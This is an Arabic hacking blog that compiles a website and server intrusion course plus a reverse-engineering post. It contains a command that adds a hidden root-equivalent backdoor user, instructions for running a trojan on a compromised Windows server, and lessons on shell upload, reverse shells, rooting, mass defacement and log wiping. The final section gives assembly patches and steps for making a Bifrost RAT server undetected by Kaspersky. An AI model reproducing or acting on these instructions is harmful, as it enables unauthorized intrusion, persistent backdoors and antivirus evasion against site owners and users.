الطريقة الاخيرة وهي اختراق النظام بباتش .. لان النظام عبارة عن ويندوز واختراقه مثله مثل اي جهاز ثاني ~

بنرفع الباتش على الموقع ... وبنشغله بالامر :

كود:
start server.exe

حيث ان server.exe هو اسم الباتش الخاص بك ~

وهيك بنكون خلصنا من شرح السيطرة على الويندوز




الان بننتقل الى اللينوكس مرة ثانية :

بنجي الى امر اضافة يوزر بصلاحية روت والدخول به عن طريق برنامج Putty

الامر بسيط جدا ... بنطبق الامر التالي :

كود:
/usr/sbin/useradd -o -u 0 -g 0 Niroda -p 123456
الامر السابق هو عبارة عن اضافة يوزر باسم Niroda الى النظام بصلاحية روت والباسورد الخاص فيه 123456

للتاكيد فقط لا أكثر بنروح بنغيير الباسورد بالامر :

كود:
passwd username
طبعا بنغير بدال username باسم اليوزر يلي ضفناه

رح تطلع رسالة تطلب منا ادخال الباسورد الجديد بنحط الباسورد الجديد او نفس الباسورد ما بتفرق فقط مشان نتاكد من اضافة اليوزر ~

ورح يرجع يطلب من تأكيد الباسورد الجديد ~

الان بنروح بناخذ اي بي السيرفر وبنروح لبرنامج البيوتي ويلي ما عنده البرنامج يحمله من هون

كود:
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
اذا دخل معنا معناها كل شي تمام ... بس اذا ما دخل معناها البورت مغيير :S

بسيطة جدا ... بنروح بنفذ الامر :

كود:
cat /etc/ssh/sshd_config
رح يطلعلنا الكونفيغ الخاص بالشل ... بنشوف باول الكونفيغ مكتوب port ... بنشوف شو الرقم الموجود قدام كلمة بورت ؟

هو بيكون المنفذ ... بنروح للبيوتي وبنتصل بالبيوتي مع تغيير البورت



الان درس الرجوع للروت ~

رابط التحميل : هنـــــــا

رابط الموضوع الاصلي :

http://arhack.net/vb/showthread.php?t=26741

طبعا في طرق كثيرة جدا للرجوع للروت وبنظري هذه اقوى طريقة للرجوع للروت بعد مسح الاثار والتخزين المؤقت 

اى استفسار يكتب فى التعليقات

0 الدرس السادس عشر-- أضافة : تخطي صلاحية اليوزر في جميع اصدارات php

الدرس السادس عشر---  أضافة : تخطي صلاحية اليوزر في جميع اصدارات php

 اعداد --- العراب محمد

أضافة للدورة وهي تخطي صلاحية اليوزر في بقية اصدارات PHP

الفوربيدن معقد الكثير من الهكر .... واليوم اضافة لدروس الدورة حل مشكلة الفوربيدن وتخطي صلاحية اليوزر
 

للتحميل : هنــــــــــا

اى استفسار يكتب فى التعليقات

0 الدرس الخامس عشر : سحب روت + ماس ديفيس + تسجيل الاختراقات

الدرس الخامس عشر : سحب روت + ماس ديفيس + تسجيل الاختراقات


اعداد --- العراب محمد




درس اليوم سحب روت + ماس ديفيس بطريقة جديدة + تسجيل الاختراقات بالزون اتش ~

التحميل : هنــــــــــا

ادرجت ملف باسم log مع الشرح فيه بعض اوامر مسح الاثار واللوج ... اتمنالكم الفائدة 



اى استفسار يكتب فى التعليقات

0 الدرس الرابع عشر : الاتصال العكسي بالسيرفر عن طريق النت كات

الدرس الرابع عشر : الاتصال العكسي بالسيرفر عن طريق النت كات
اعداد --- العراب محمد

ان شاء الله بخير وصحة وعافية ؟

درس اليوم سهل وبسيط كتير

بتركم مع التحميل : هنــــــــا


اى استفسار يكتب فى التعليقات

0 الدرس الثالث عشر : تخطي صلاحية اليوزر 2

الدرس الثالث عشر : تخطي صلاحية اليوزر2
اعداد --- العراب محمد


درس اليوم تخطي صلاحية اليوزر للنسخ php : 5.2.12 - 5.2.13 - 5.2.14

طبعا دروس تخطي صلاحية اليوزر بتلزمنا بالاستهداف

بتركم مع التحميل : هنـــــــــــــا

 

اتمنالكم الفائدة 

اى استفسار يكتب فى التعليقات

0 الدرس الثاني عشر : بداية الاستهداف + تخطي صلاحية اليوزر ..

الدرس الثاني عشر : بداية الاستهداف + تخطي صلاحية اليوزر ..

اعداد --- العراب محمد

درس اليوم استهداف مع تخطي لصلاحية اليوزر ~

التحميل
: هنــــا

تم رفع الدرس ع مركز تحميل اخر على
http://www.multiupload.com/T7Y5HDIWL1


اى استفسار يكتب فى التعليقات

0 الدرس الحادي عشر : تخطي السيف مود اون

الدرس الحادي عشر : تخطي السيف مود اون

اعداد--- العراب محمد

درس اليوم سهل وبسيط ... تخطي السيف مود اون وتنفيذ الاوامر

بتركم مع التحميل
: هنــــــا


اى استفسار يكتب فى التعليقات

0 الدرس العاشر : الشل , الأوامر

الدرس العاشر : الشل , الأوامر

اعداد -- العراب محمد

درس اليوم سهل وبسيط ...
بتركون مع التحميل : هنـــــــــا

ادرجت ملف الاوامر مع الشرح بملف htm

اي استفسار يكتب فى التعليقات.

تم رفع الدرس ع مركز تحميل اخر على
http://www.multiupload.com/DNP6MS3S2S

0 الدرس التاسع : الشل , التصاريح , الصلاحيات

الدرس التاسع : الشل , التصاريح , الصلاحيات

اعداد -- العراب محمد
 

درس اليوم سهل وبسيط كتير ..

 مع التحميل : هنــــا

اي استفسار انا بالخدمة .. بتحطو استفساراتكون بموضوع الاستفسارات عن الدرس التاسع


تم رفع الدرس ع مركز تحميل اخر على
http://www.multiupload.com/0GXK1RXMB0


اى استفسار يكتب فى التعليقات

0 الدرس الثامن شرح ال brute force

الدرس الثامن [شرح ال brute force ]

اعداد --- العراب محمد


ان شاء الله شباب النهارده هنشرح الاخترقا عن طريق

ال brute force

الدرس سهل و ممتع و سهل و كل شى

للتحميل

AR-hack

تم رفع الدرس ع مركز تحميل اخر من قبل

http://www.multiupload.com/CZN4HKA7AN

اى استفسار يكتب فى التعليقات

0 الدرس السابع -- ما يتعلق بثغرة ال xss الجزء الثالث

الدرس السابع-- ما يتعلق بثغرة ال xss الجزء الثالث

اعداد --- العراب محمد

ان شاء الله درس اليوم سهل و جميل و الكل ح يفهمه

و هو شرح xss reflected

لتحميل الدرس

AR-hack

تم رفع الدرس من مركز تحميل اخرعلى
http://www.multiupload.com/RG5IKWT9BA


اى استفسار يكتب فى التعليقات

0 الدرس السادس (ما يتعلق بثغرة ال xss) الجزء الثانى

 الدرس السادس  ما يتعلق بثغرة ال xssالجزء الثانى

اعداد--- العراب محمد


اتمنى يكون الشباب بخير .... اليوم الجزء الثانى لثغرات ال xss شرح تفصيلى 40 دقيقه

انشاء الله بيفيد الشباب و اللى ما فهم الدرس اللى فات اكيد بيفهم هذا

حجم الملف كبير
طبعا امتداد الملف ليس ب zip او rar و لكن

لفك الضغط تقدر تستخدم ال winrar عادى شباب

اتمنى يفيدكم

اى استفسار يكتب فى التعليقات

للتحميل


AR-hack


أو

AR-hack2

تم رفع الدرس ع مركز تحميل اخر على
 

http://www.multiupload.com/BX0DY2K00Q

ملاحظة تم وضع الدورة صوت و صورة الاخ   ( linux.bt3   )  

0 الدرس الخامس -- ما يتعلق بثغرة ال xss

الدرس الخامس ما يتعلق بثغرة ال xss

اعداد --- العراب محمد
 
يا رب يكون الجميع بخير.....انشاء الله النهارده معانا درس بسيط و جميل و هو شرح

استغلال ثغرات ال xss و انشاء الله بيفيد الجميع .....


حمل من
هنا


انشاء الله اى استفسار يكتب فى التعليقات


تم رفع الدرس ع مركز تحميل اخر على
http://www.multiupload.com/CV4I1BSLBC
 
ملاحظة : تم وضع الدورة صوت و صورة الاخ محترف الاختراق (linux.bt3)

0 الدرس الرابع -- كل ما يتعلق بثغرة الابلود

الدرس الرابع كل ما يتعلق بثغرة الابلود 

اعداد-- العراب محمد

درس اليوم سهل كتير وسلس وان شاء الله يكون مفهوم وواضح

بتركم مع التحميل : هنــــــــ


لا تنسونا من الدعاء



تم رفع الدرس ع مركز تحميل اخر على
http://www.multiupload.com/C7Z7DDU2B3


 انشاء الله اى استفسار يكتب فى التعليقات


ملاحظة : تم وضع الدورة صوت و صورة الاخ محترف الاختراق ( نيرودا )

0 الدرس الثالث [ Include ]

الدرس الثالث [ Include ]

اعداد-- العراب محمد

اليوم درسنا عن ثغرة include :

1- معناها

2 - سبب تشكل الثغرة ؟

3 - الاستغلال

4 - رفع الشل

اترككم مع التحميل من : هنـــــا

تم رفع الدرس ع مركز تحميل اخر على
http://www.multiupload.com/27LPASNK7A


انشاء الله اى استفسار يكتب فى التعليقات 

ملاحظة : تم وضع الدورة صوت و صورة الاخ محترف الاختراق ( نيرودا )

0 الدرس الثاني [الجزء2 من SQL وطريقة كشف مسار لوحة التحكم]


طريقة كشف مسار لوحة التحكم

 اعداد --- العراب محمد

بتركم مع الدرس
 

التحميل : هنــــا

اتمنى يكون الدرس واضح وسهل


الدرس القادم بأذن الله ح نتكلم عن حقن قواعد البيانات للغة البرمجة asp


تم رفع الدرس ع مركز تحميل اخر على

http://www.multiupload.com/5MG4A2Q3RB


انشاء الله اى استفسار يكتب فى التعليقات 

ملاحظة ::: تم وضع الدورة صوت وصورة الاخ محترف الاختراق  ( نيرودا  )

0 الدرس الثاني [ كل ما يتعلق بثغرة SQL Injection ] الجزء 1


الدرس الثاني [ كل ما يتعلق بثغرة SQL Injection ] الجزء1


اعداد ---- العراب محمد




اخواني اليوم درسنا عن السكيول SQL Injection وكل ما يتعلق به


للتحميل : هنـــــا

دمتم بحفظ الرحمن


تم اعادة رفع الدرس على

http://www.multiupload.com/OD9LJWRCGC


اى استفسار انشاء الله يكتب فى التعليقات 

ملاحظة ::: تم وضع الدورة صوت وصورة الاخ محترف الاختراق  ( نيرودا  )

0 مقدمة قبل البدء فى اختراق المواقع


بسم الله الرحمن الرحيم

اعداد --- العراب محمد
 

قبل بدء الدورة حابب اطرحلكم بعض الأمور الرجاء التقيد بها :

أخواني الكرام الاختراق ليس بالمستحيل وفي نفس الوقت ليس بالامر السهل


1- الصبر وعدم التذمر ومتابعة الدروس وفهما جيدا ...

اول صفة للهكر هي الصبر والمحاولة وعدم اليأس

يعني مثلا بيجي واحد وصارت معي كثير بيقلي بدي اخترق الموقع الفلاني او المنتدى الفلاني
طيب يا اخي روق شوي في امور كثيرة جدا لازم تفهما قبل ما تقول بدي اخترق شو هي كلمة بدي اخترق بس قلتها يتم الاختراق ؟؟
ركز واصبر ووقت بدك تقرأ أي درس كان ركز فيه منيح ولا تشغل بأي شيء كان ( سكر مسنجر ... سكر الباب على حالك ... ما تقرأ الدرس وانت بتتسلى مع حدا ... الى ما ذلك من امور )


2- الحماية خلقت لتخترق ..

هذا اهم قانون بالهكر ,,, يعني لازم تفهم انه ما في حماية 100/100 وهذا امر مستحيل
معنى هذا القانون انك لازم تقتنع وتحط براسك انه ما في شي اسمه حماية مية مية وبتضلك تحاول وتجرب لحتى تخترق


3- سيدرج لكل درس موضوع خاص بالاستفسارات وتطرحون فيه اي استفسار والاستفسارات المتكررة لن يتم الرد عليها ( راجع الاستفسارات التي قبلها )

4- وبالنسبة يلي معه ايميلي ما حدا يستفسر على الايميل ( مو تكبر او شي ) بس ممكن الاستفسار يلي بدك تستفسره على الايميل يستفاد منه غيرك كمان لذلك حطه بموضوع الاستفسارات ..

الان بطرحلكم فهرس الدورة ويلي رح نمشي عليه باذن الله رب العالمين

1- الاساسيات وشرح عن تركيبة المواقع وبيئتها
2- شرح الثغرات ( كل ثغرة سيكون لها شرح خاص بها )
3- رفع الشل بكل انواع الثغرات ( كمان لكل ثغرة رح نحدد درس لحاله وخاص فيها وطريقة رفع الشل )
4- ما بعد رفع الشل وتطبيق الاوامر واهم الاوامر اللازمة وعملها
5- تخطي المشاكل Forbidden - not accebtalbe - server error - .... etc
6- تخطي Safe_Mode
7- الاتصال بالسيرفر بالنت كات وحل مشاكل الاتصال العكسي من دون فتح بورت
8- طريقة ترويت السيرفر
9- عمل ماس ديفيس ومسح اثارك من على السيرفر
10- تسجيل الاختراقات في الزون اتش


ملاحظة ::: تم وضع الدورة صوت وصورة الاخ محترف الاختراق  ( نيرودا  )

وان نسيت شيئا الان سنقوم باضافته في الدروس باذن الرحمن

ادعو الله لي ولكم التوفيق

0 دورة اختراق المواقع والسيرفرات----الدرس الاول [ المواقع وانواعها وتركيبتها وطريقة عملها ] ..






     
اول دروس الدورة سهل وبسيط وما بده شي

ان شاء الله يكون مفهوم للجميع

بترككم مع التحميل : هنــــــــا

اي استفسار ضعه بموضوع استفسارات الدرس الاول ...

دمتم بحفظ الرحمن

تم رفع الدرس ع مركز تحميل اخر
 
http://www.multiupload.com/AJLN9TWMVI
 
انشاء الله اى استفسار يكتب فى  التعليقات
 
ملاحظة ::: تم وضع الدورة صوت وصورة الاخ محترف الاختراق  ( نيرودا  )

الخميس، 26 مايو، 2011

0 شرح الهندسه العكسيه



الحمـد لله والصلآه والسلآم على أشرف خلق الله .. سيد الأنبياء وخاتمهم أجمعين إلى يوم الدين

اما بعـد :

شرح الهندسه العكسيه

اعداد--- العراب محمد
ما هي الهندسة العكسية وفيما تستخدم

التعريف الأكاديمي للهندسة العكسية:

الهندسة العكسية : هي عملية اكتشاف المبدأ التكنولوجي لاداة او نظام من


خلال تحليل هيكله او وظيفته او طريقة عمله.


وغالبا ما يشمل أخذ شيء (جهاز ميكانــيكـــي, آلية جهاز الكتروني او


عنصربرنامج حاسوبي) وتفكيكه الى قطع وتحليل طريقة عمله بالتفصيل بغية


انشاء جهاز جديد او برنامج جديد يقوم بنفس العمل من دون نسخ الاصل.


الهندسة العكسية هي في الاساس علم وتستخدم الاسلوب العلمي.



علوم مثل علم الاحياء و الفيزياء يمكن اعتبارها هندسة عكسية للآلات


البيولوجية او آلات العالم المادي. في علوم الحاسوب, الهندسة العكسية تعتبر


حقل علمي


ثانوي لان علم الحاسوب يعتبر علم بناء اي هندسة امامية او الى الامام.


في بعض البلدان, لو كان المنتج او طريقة صنع المنتج محمي باعتباره سراً


تجارياً, فأن اجراء الهندسة العكسية عليه هي عملية قانونية طالما تم الحصول


عليه/عليها بطريقة شرعية.


براءات الاختراع من الناحية الاخرى, تتطلب


الكشف عن الاختراع حتى يتم تسجيلها, لذلك ليس هنالك اي ضرورة لاجراء


هندسة عكسية على اختراع من اجل دراستها. هنالك دافع واحد مشترك
 

لاجراء الهندسية العكسية وهو لتحديد ما اذا كان المنتج المنافس يتضمن

انتهاكات لحقوق الطبع او انتهاكات لحقوق النشر.

والهندسة العكسية هي بحر كبير ونحن سوف نركز في هذا القسم علي الهندسة العكسية للبرمجيات.

اي عملية تحليل البرامج وفهم طريقة عملها و التعديل عليها باضافة خواص جديدة لها (دون ان تمتلك السورس كود)

او صناعة الكراك و الكي جين.

ايضا ستحتاج في مشوار الهندسة العكسية الي معرفة بعض التعريفات الهامة التي

سوف تجدها بكثرة في الدروس او في الكتاب الذي سأضعة لاحقا ان شاء الله. وأهم

هذة التعريفات هي:
RCE = Reverse Code Engineering

الهندسة العكسية للكود - اي للبرمجيات / البرامج
PID = Process ID

كل برنامج يعمل في الذاكرة له رقم ID يميزه عن غيره من البرامج التي تنفذ في

الذاكرة في نفس الوقت.
-
IDA =Interactive DisAssembler

برنامج صاحبة يستحق جائزة نوبل عبارة عن Disassembler و منقح في نفس الوقت.

Disassembler

برنامج يعطيك الملف المصدري بلغة التجميع لاي برنامج انطلاقا من الملف التنفيذي.
loader

بريمج صغير يستدعى / ينفذ/يحمل برنامج اخر ويغير به بالذاكرة.

Attachلديك برنامج ما يعمل بالذاكرة و تريد ان تنقحه، تقوم بعمل Attach له لكي تستطيع

تنقيحه، اسف لا اعرف المصطلح باللغة العربية.

Hex

هو نظام عد مثل ال decimal (ميزان ستة عشر) اي يتكون من 16 رقم

وهم 0 1 2 3 4 5 6 7 8 9 A B C D E F-

Debugger

هي برامج تسمي ببرامج التنقيح وهي تحول اي برنامج الي لغة الأسمبلي وتسمح

لنا بالتعديل في كود البرنامج الأصلي.
UnPackers

برامج تستخدم في فك تشفير البرامج المشفرة اوتوماتيكيا

Packers

هي البرامج التي تستخدم في تشفير البرامج ووضع حماية عليها.
FileMonitor



برنامج يقوم بمراقبة اي برنامج أخر يقوم بأنشاء ملف.
RegMonitor

برنامج يستخدم في مراقبة الريجستر ومراقبة اي تعديل فية.

PE

هي البرامج التي تعمل في بيئة الويندوز ويكون لها واجهة مستخدم .


PE edit

برامج تستخدم للتعديل في ال PE وفحص جميع اقسمها.
Import REConstructor

برنامج هام جدا ويستخدم في اصلاح ال import table ويستخدم في عملية فك التشفير اليدوي.
ResTuner

برنامج يستخدم مثلا في تعريب البرامج او تغيير صورة البرنامج بصورة اخري ولة

استعمالات اخري مفيدة جدا.

WinAsm

برنامج يستخدم لكتابة البرامج بلغة الأسمبلي.

MASM32

برنامج لا غني عنة للبرمجة بالأسمبلي.

اما عن فك الضغط يدويا اي فك تشفير البرامج المشفرة بنفسك دون استخدام برامج

الـ ( unpackers )

لانك سوف تواجة برامج تشفير لا يمكن فكها الا يدويا.

بالأخير رآح أرفق لكم كم هائل من اكواد OllY


خمسة اكواد كسر



RETN
RETN
push ebp نقطة الادخآل الجديدة
mov ebp,esp
NOT AX
PUSHAD
ROR AX,4
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
jmp هنا الاوفست نقطة الادخال الاصلية
push نقطة الادخآل االجديدة
jmp eax
jmp eax
RETN
RETN

-------------------------------

الكود الثـاني


push ebp
mov ebp,esp
sub AX,5
nop
nop
nop
jmp نقطة الإدخآل
nop
nop
nop


-------------

الكود الثـالث

ADD AX,99
SUB AX,7
XOR AX,5
NOP
NOT AX
PUSHAD
ROR AX,4
NOP
NOP
CALL نقطة ا لا دخآل
RETN



--------------

الكود الرآبع

ADD AX,99
SUB AX,7
XOR AX,5
NOP
NOT AX
PUSHAD
ROR AX,4
NOP
NOP
CALL نقطة ا لا دخآل
RETN



---------
الكود الخامس

ADD AX,99
SUB AX,7
XOR AX,5
NOP
NOT AX
PUSHAD
ROR AX,4
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
PUSHAD
nop
nop
nop
nop
nop
nop
nop
nop
CALL نقطة الإدخآل
jmp eax
jmp eax
RETN
RETN

كود لكسر 41 حمايه


هنا الكال
jmp هنا الجيمب أو الجلي
int3
mov edi,edi
push ebp
mov ebp,esp
mov eax,dword ptr ss:[ebp+8]
mov ecx,dword ptr ds:[eax+3c]
add ecx,eax
movzx eax,word ptr ds:[ecx+14]
push ebx
push esi
movzx esi,word ptr ds:[ecx+6]
xor edx,edx
push edi
lea eax,dword ptr ds:[eax+ecx+18]
test esi,esi
jbe short الاختصار
mov edi,dword ptr ss:[ebp+c]
mov ecx,dword ptr ds:[eax+c]
cmp edi,ecx
jb short الاختصار
mov ebx,dword ptr ds:[eax+8]
add ebx,ecx
cmp edi,ebx
jb short الاختصار
inc edx
add eax,28
cmp edx,esi
jb short الاختصار
xor eax,eax
pop edi
pop esi
pop ebx
pop ebp




والآن . مع كسر الكآسبر العنيد بالقيم الي عقدة اكثر مبتدئي التشفير

تابعو شرح كسر الكآسبر بالصـور

دائما اقول ان لم تعرف اين توجد القيم التي تضعها الحمايات في البرامج فلن تعرف كيف تتخطاها

زمان لما كنا نتعلم التشفير ببرنامج الهيكس كان يتوجب علينا حصر القيم و من تم التعديل عليها

لكن الكثير يعتقد ان هذا المنطق لا ينطبق على برنامج olly

الهيكس و olly برنامجان لعملة واحدة

صورتان تظهران على ان الكاسبر مكشوف من القيمة التالية



و صورتان تظهران على ان الكاسبر غير مكشوف



كيف حدث ذلك؟

كما قلت في السابق ان لم تعرف اين توجد القيمة فلا يمكنك التشفير

من خلال تجربتي مع سرفر البفروست الاحظ دائما ان قيمة الكاسبر توجد في احد دوال البرنامج

الدالة هيGetModuleHandleA في الحقيقة سرفر البفروست يحوي دالتان من هذا النوع

افتح سرفر البفروست بواسطة برنامج olly و اذهب الى الدوال التي يستوردها البرنامج (سرفر) كما في الصورة



هاهي الدوال المستوردة



اضغط على الدالة التي توجد في الاطار الاحمر مرتين



ها قد عدنا الى واجهة البرنامج و بالظبط عند الدالة GetModuleHandleA

طيب فكر معي كيف يمكننا تغيير الاوامر بدون اعطاب السرفر لاننا كما نعلم ان الدالة دالة مهمة اي خطأ صغير سينعطب السرفر

نلاحظ عند بداية الدالة يوجد الامر الاتي push 0A

لو كنت استوعبت الدرس الماضي حول كيفية عمل الاوامر لفهمت ان هذا الامر

هو دفع العدد 0A الى المكدس و العدد هنا هيكسي اي بالنظام السداسي عشري

طيب كيف نغيره اذن سنبقي على الامر push لكن عوض ان نكتب العدد بالهيكس نكتبه بالنظام العشري اي اننا نحوله من الهيكس الى نظامنا المؤلوف العشري


0A = 10 بالنظام العشري





نحفظ السرفر باي اسم كما يعرف الجميع و نجرب التبليغ



بالاخير
إن  أصبنا  فمن  الله  سبحانه وتعالى
وإ‘ن أخطأنا فمن انفسنا والشيطان الرجيم لعنت الله ع ليه وعلى اعوانه

 

وكل جديد عن الهندسة العكسية فقط على العرابين هكر
وقريب تبسيط الهندسة العكسية حصريا على العرابين هكر

كلمة شكر وتقييم تكفي